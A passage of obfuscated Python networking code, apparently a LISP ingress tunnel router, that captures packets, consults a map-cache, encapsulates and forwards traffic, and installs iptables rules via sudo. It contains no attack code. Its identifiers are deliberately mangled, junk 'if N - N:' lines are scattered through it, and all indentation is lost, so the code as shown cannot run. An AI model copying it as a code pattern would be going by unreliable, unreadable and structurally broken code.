lisp . lprint ( "User pcap-list: {}, active-interfaces: {}" . format ( i1iiiii1 , iIiIIi1 ) )
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
iIiIIi1 = Ii1IIIIi1ii1I
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
if 92 - 92: ooOoO0o
II11iI111i1 = ( i1I11IiI1iiII . find ( "ether host" ) != - 1 )
for Oo00OoOo in iIiIIi1 :
if ( Oo00OoOo in [ "lo" , "lispers.net" ] and II11iI111i1 ) :
lisp . lprint ( ( "Capturing suppressed on interface {}, " + "MAC filters configured" ) . format ( Oo00OoOo ) )
if 24 - 24: i11iIiiIii - I1Ii111
continue
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
if 11 - 11: OoooooooOO . I1Ii111
if 80 - 80: OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / I1IiiI / OOooOOo
if 13 - 13: I1Ii111 * ooOoO0o + i11iIiiIii * I1Ii111 - ooOoO0o
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * IiII
if ( lisp . lisp_is_macos ( ) ) :
if ( Oo00OoOo not in [ "en0" , "lo0" ] ) : continue
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
o0 = [ Oo00OoOo , i1I11IiI1iiII , i1iIIi1 ]
lisp . lprint ( "Capturing packets on {}interface {}" . format ( O0iII1 , Oo00OoOo ) )
threading . Thread ( target = iiiI1I1iIIIi1 , args = o0 ) . start ( )
if 17 - 17: iIii1I11I1II1 . OoooooooOO / I11i % II111iiii % i1IIi / i11iIiiIii
if ( ii1iIi1iIiI1i ) : return
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
OO00OO0O0 = "(udp src port 4342 and ip[28] == 0x28)"
for Oo00OoOo in IIII1i :
o0 = [ Oo00OoOo , OO00OO0O0 , i1iIIi1 ]
lisp . lprint ( "Capture RLOC-probe replies on RLOC interface {}" . format ( Oo00OoOo ) )
if 48 - 48: I1Ii111
threading . Thread ( target = iiiI1I1iIIIi1 , args = o0 ) . start ( )
if 72 - 72: iII111i * oO0o % Ii1I . OoooooooOO
return
if 99 - 99: iIii1I11I1II1 % ooOoO0o + ooOoO0o + iII111i - I1Ii111 / I1Ii111
if 7 - 7: I1IiiI + OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
def i1i1i1I ( ) :
if 83 - 83: oO0o + OoooooooOO
if 22 - 22: Ii1I % iII111i * OoooooooOO - o0oOOo0O0Ooo / iIii1I11I1II1
if 86 - 86: OoooooooOO . iII111i % OoOoOO00 / I11i * iII111i / o0oOOo0O0Ooo
if 64 - 64: i11iIiiIii
if ( I11 ) : I11 . cancel ( )
if 38 - 38: IiII / I1IiiI - IiII . I11i
if 69 - 69: OoooooooOO + I1ii11iIi11i
if 97 - 97: OOooOOo - OoO0O00 / Ii1I . i11iIiiIii % oO0o * oO0o
if 1 - 1: I1IiiI % ooOoO0o
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( i111I , "" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "lisp-itr" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lispers.net-itr" )
return
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def ii1iii1I1I ( packet , device , input_interface , macs , my_sa ) :
global II1iII1i
global iiI1iIiI
global Ii1IIii11 , Oooo0000
global oO0oIIII
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
ii1Ii1IiIIi = packet
packet , o0OO0 , oOo00Oo0o0Oo , I1 = lisp . lisp_is_rloc_probe ( packet , 1 )
if ( ii1Ii1IiIIi != packet ) :
if ( o0OO0 == None ) : return
lisp . lisp_parse_packet ( II1iII1i , packet , o0OO0 , oOo00Oo0o0Oo , I1 )
return
if 26 - 26: ooOoO0o . OOooOOo - OOooOOo . OoO0O00
if 39 - 39: OoooooooOO + oO0o % OOooOOo / OOooOOo
packet = lisp . lisp_packet ( packet )
if ( packet . decode ( False , None , None ) == None ) : return
if 27 - 27: iII111i . I11i . iIii1I11I1II1 . iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if ( my_sa ) : input_interface = device
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
oOo000 = packet . inner_source
OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , oOo000 )
packet . inner_dest . instance_id = OO00Oo
packet . inner_source . instance_id = OO00Oo
if 14 - 14: OoO0O00 . II111iiii . I11i / Ii1I % I1ii11iIi11i - ooOoO0o
if 67 - 67: I11i - OOooOOo . i1IIi
if 35 - 35: iII111i + ooOoO0o - oO0o . iII111i . IiII
if 87 - 87: OoOoOO00
if ( macs != "" ) : macs = ", MACs: " + macs + ","
packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
if 25 - 25: i1IIi . OoO0O00 - OoOoOO00 / OoO0O00 % OoO0O00 * iIii1I11I1II1
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if ( device != input_interface and device != "lispers.net" ) :
lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
return
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
IiI1iII1II111 = lisp . lisp_decent_push_configured
if ( IiI1iII1II111 ) :
IIiI11i1111Ii = packet . inner_dest . is_multicast_address ( )
o00O0O = packet . inner_source . is_local ( )
IiI1iII1II111 = ( o00O0O and IIiI11i1111Ii )
if 70 - 70: Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if ( IiI1iII1II111 == False ) :
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
if ( Oo0ooOo0o == None ) :
lisp . dprint ( "Packet received from non-EID source" )
return
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
IIiiii = lisp . lisp_allow_dynamic_eid ( input_interface ,
packet . inner_source )
if ( IIiiii ) :
lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
input_interface , IIiiii , oO0oIIII )
else :
iI111i1I1II = lisp . green ( packet . inner_source . print_address ( ) , False )
lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( iI111i1I1II ,
input_interface ) )
return
if 96 - 96: I1Ii111 / Oo0Ooo * II111iiii - iII111i * Oo0Ooo
if 81 - 81: IiII . o0oOOo0O0Ooo / I1Ii111
if 17 - 17: i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + I11i - ooOoO0o
if ( packet . inner_source . is_local ( ) and
packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
if 78 - 78: I11i * OoOoOO00 . O0 / O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
OoO = False
if ( packet . inner_version == 4 ) :
OoO , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
else :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
packet . encap_port = lisp . LISP_L2_DATA_PORT
if 54 - 54: I11i / I1IiiI * oO0o + OoooooooOO - iII111i / OoooooooOO
if 19 - 19: IiII * ooOoO0o * o0oOOo0O0Ooo + O0 / O0
if 73 - 73: iIii1I11I1II1 / iIii1I11I1II1 - oO0o
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if ( oo0O000OoO == False ) :
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured == False ) :
lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
return
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
I11iIiII = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
if ( I11iIiII ) : I11iIiII . add_recent_source ( packet . inner_source )
if 66 - 66: Oo0Ooo - o0oOOo0O0Ooo * IiII + OoOoOO00 + o0oOOo0O0Ooo - iIii1I11I1II1
if 17 - 17: oO0o
if 22 - 22: I11i + iIii1I11I1II1
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if 17 - 17: I1ii11iIi11i . II111iiii . ooOoO0o / I1ii11iIi11i
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
oO00oOo0OOO = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
if ( oO00oOo0OOO and I11iIiII and I11iIiII . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
ii1 = packet . inner_dest
ii1 . instance_id = oO00oOo0OOO
I11iIiII = lisp . lisp_map_cache_lookup ( packet . inner_source , ii1 )
if ( I11iIiII ) : I11iIiII . add_recent_source ( packet . inner_source )
if 51 - 51: O0 . oO0o + i11iIiiIii
if 79 - 79: OoOoOO00 . oO0o . IiII % Ii1I
if 65 - 65: i11iIiiIii + i1IIi - Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if ( I11iIiII == None or lisp . lisp_mr_or_pubsub ( I11iIiII . action ) ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) ) : return
if 12 - 12: OOooOOo
ooOo0O = ( I11iIiII and I11iIiII . action == lisp . LISP_SEND_PUBSUB_ACTION )
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None , ooOo0O )
if 37 - 37: Ii1I % OoO0O00
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "map-cache miss" )
if 79 - 79: I1ii11iIi11i + I1IiiI / I1IiiI
return
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if ( I11iIiII and I11iIiII . is_active ( ) and I11iIiII . has_ttl_elapsed ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( I11iIiII . print_eid_tuple ( ) , False ) ) )
if 1 - 1: ooOoO0o
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
I11iIiII . last_refresh_time = time . time ( )
I11iIiII . stats . increment ( len ( packet . packet ) )
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
OO0OoOOO0 , O00ooOo , oOO0o00O , oOoO , IIII , iI1iiiIiii = I11iIiII . select_rloc ( packet , oO0oIIII )
if 24 - 24: iIii1I11I1II1 + iIii1I11I1II1 * iII111i
if 18 - 18: iII111i * I11i - Ii1I
if ( OO0OoOOO0 == None and IIII == None ) :
if ( oOoO == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "not an EID" )
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
return
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
iii1III1i = "No reachable RLOCs found"
lisp . dprint ( iii1III1i )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = iii1III1i )
return
if 17 - 17: II111iiii / II111iiii
if ( OO0OoOOO0 and OO0OoOOO0 . is_null ( ) ) :
iii1III1i = "Drop action RLOC found"
lisp . dprint ( iii1III1i )
if 65 - 65: IiII + Oo0Ooo
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = iii1III1i )
return
if 59 - 59: OoooooooOO + I11i . I1Ii111 - O0 % iIii1I11I1II1 / O0
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
packet . outer_tos = packet . inner_tos
packet . outer_ttl = 32 if ( OoO ) else packet . inner_ttl
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if ( OO0OoOOO0 ) :
packet . outer_dest . copy_address ( OO0OoOOO0 )
iI = packet . outer_dest . afi_to_version ( )
packet . outer_version = iI
i11ii = lisp . lisp_myrlocs [ 0 ] if ( iI == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 50 - 50: Ii1I / OoOoOO00 * Ii1I
packet . outer_source . copy_address ( i11ii )
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , rloc_entry = iI1iiiIiii ) == False ) : return
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if ( packet . encode ( oOO0o00O ) == None ) : return
if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
o0OooooOoOO = Oooo0000 if iI == 6 else Ii1IIii11
packet . send_packet ( o0OooooOoOO , packet . outer_dest )
if 19 - 19: IiII
elif ( IIII ) :
if 78 - 78: OOooOOo % o0oOOo0O0Ooo
if 39 - 39: I1ii11iIi11i + I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo
if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
i1i1IiIiIi1Ii = IIII . rle_nodes [ 0 ] . level
oO0ooOO = len ( packet . packet )
for IIi1iI1 in IIII . rle_forwarding_list :
if ( IIi1iI1 . level != i1i1IiIiIi1Ii ) : return
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
packet . outer_dest . copy_address ( IIi1iI1 . address )
if ( IiI1iII1II111 ) : packet . inner_dest . instance_id = 0xffffff
iI = packet . outer_dest . afi_to_version ( )
packet . outer_version = iI
i11ii = lisp . lisp_myrlocs [ 0 ] if ( iI == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
packet . outer_source . copy_address ( i11ii )
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if ( packet . encode ( None ) == None ) : return
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
packet . print_packet ( "Replicate-to-L{}" . format ( IIi1iI1 . level ) , True )
packet . send_packet ( Ii1IIii11 , packet . outer_dest )
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
I11i1iIiiIiIi = len ( packet . packet ) - oO0ooOO
packet . packet = packet . packet [ I11i1iIiiIiIi : : ]
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
if 1 - 1: IiII / IiII - i11iIiiIii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
del ( packet )
return
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
def Iiii1ii ( device , not_used , packet ) :
I1i111IiIiIi1 = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if 39 - 39: I11i - I1ii11iIi11i
if ( lisp . lisp_frame_logging ) :
OOO0o0OO0OO = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
False )
oOo0O = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
lisp . lprint ( "{}: {}" . format ( OOO0o0OO0OO , oOo0O ) )
if 43 - 43: o0oOOo0O0Ooo . iII111i . I11i + iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 % OoOoOO00 + I1ii11iIi11i / i1IIi % II111iiii + OOooOOo
if 91 - 91: iIii1I11I1II1 % OoO0O00 . o0oOOo0O0Ooo + Ii1I + o0oOOo0O0Ooo
if 95 - 95: Ii1I + I1ii11iIi11i * OOooOOo
if 16 - 16: I11i / I1IiiI + OoO0O00 % iIii1I11I1II1 - i1IIi . oO0o
iIi1iIIIiIiI = ""
OooOo000o0o = False
OOo0oO00ooO00 = device
if ( I1i111IiIiIi1 == 14 ) :
iIiIIi1 , iI1I1iII1i , iiIIii , OooOo000o0o = lisp . lisp_get_input_interface ( packet )
OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
iIi1iIIIiIiI = lisp . lisp_format_macs ( iI1I1iII1i , iiIIii )
if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : I1i111IiIiIi1 += 4
if 70 - 70: o0oOOo0O0Ooo - OOooOOo
if 62 - 62: I11i
if 63 - 63: OOooOOo + ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if ( int ( iiIIii [ 1 ] , 16 ) & 1 ) : OooOo000o0o = True
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if ( I1i111IiIiIi1 != 0 ) :
i1iii11 = struct . unpack ( "H" , packet [ I1i111IiIiIi1 - 2 : I1i111IiIiIi1 ] ) [ 0 ]
i1iii11 = socket . ntohs ( i1iii11 )
if ( i1iii11 == 0x8100 ) :
oO = struct . unpack ( "I" , packet [ I1i111IiIiIi1 : I1i111IiIiIi1 + 4 ] ) [ 0 ]
oO = socket . ntohl ( oO )
OOo0oO00ooO00 = "vlan" + str ( oO >> 16 )
I1i111IiIiIi1 += 4
elif ( i1iii11 == 0x806 ) :
lisp . dprint ( "Dropping ARP packets, host should have default route" )
return
if 51 - 51: I11i * o0oOOo0O0Ooo
if 78 - 78: IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if ( lisp . lisp_l2_overlay ) : I1i111IiIiIi1 = 0
if 47 - 47: o0oOOo0O0Ooo
ii1iii1I1I ( packet [ I1i111IiIiIi1 : : ] , device , OOo0oO00ooO00 , iIi1iIIIiIiI , OooOo000o0o )
return
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
def OO0oOOoo ( sources , dyn_eids ) :
if ( os . getenv ( "LISP_NO_IPTABLES" ) != None ) :
lisp . lprint ( "User selected to suppress installing iptables rules" )
return
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
os . system ( "sudo iptables -t raw -N lisp" )
os . system ( "sudo iptables -t raw -A PREROUTING -j lisp" )
os . system ( "sudo ip6tables -t raw -N lisp" )
os . system ( "sudo ip6tables -t raw -A PREROUTING -j lisp" )
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
Oo00OO0OO = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
OOo00OO0O0O = [ "127.0.0.1" , "::1" , "224.0.0.0/4 -p igmp" , "ff00::/8" ,
"fe80::/16" ]
OOo00OO0O0O += sources + lisp . lisp_get_all_addresses ( )
for OO0 in OOo00OO0O0O :
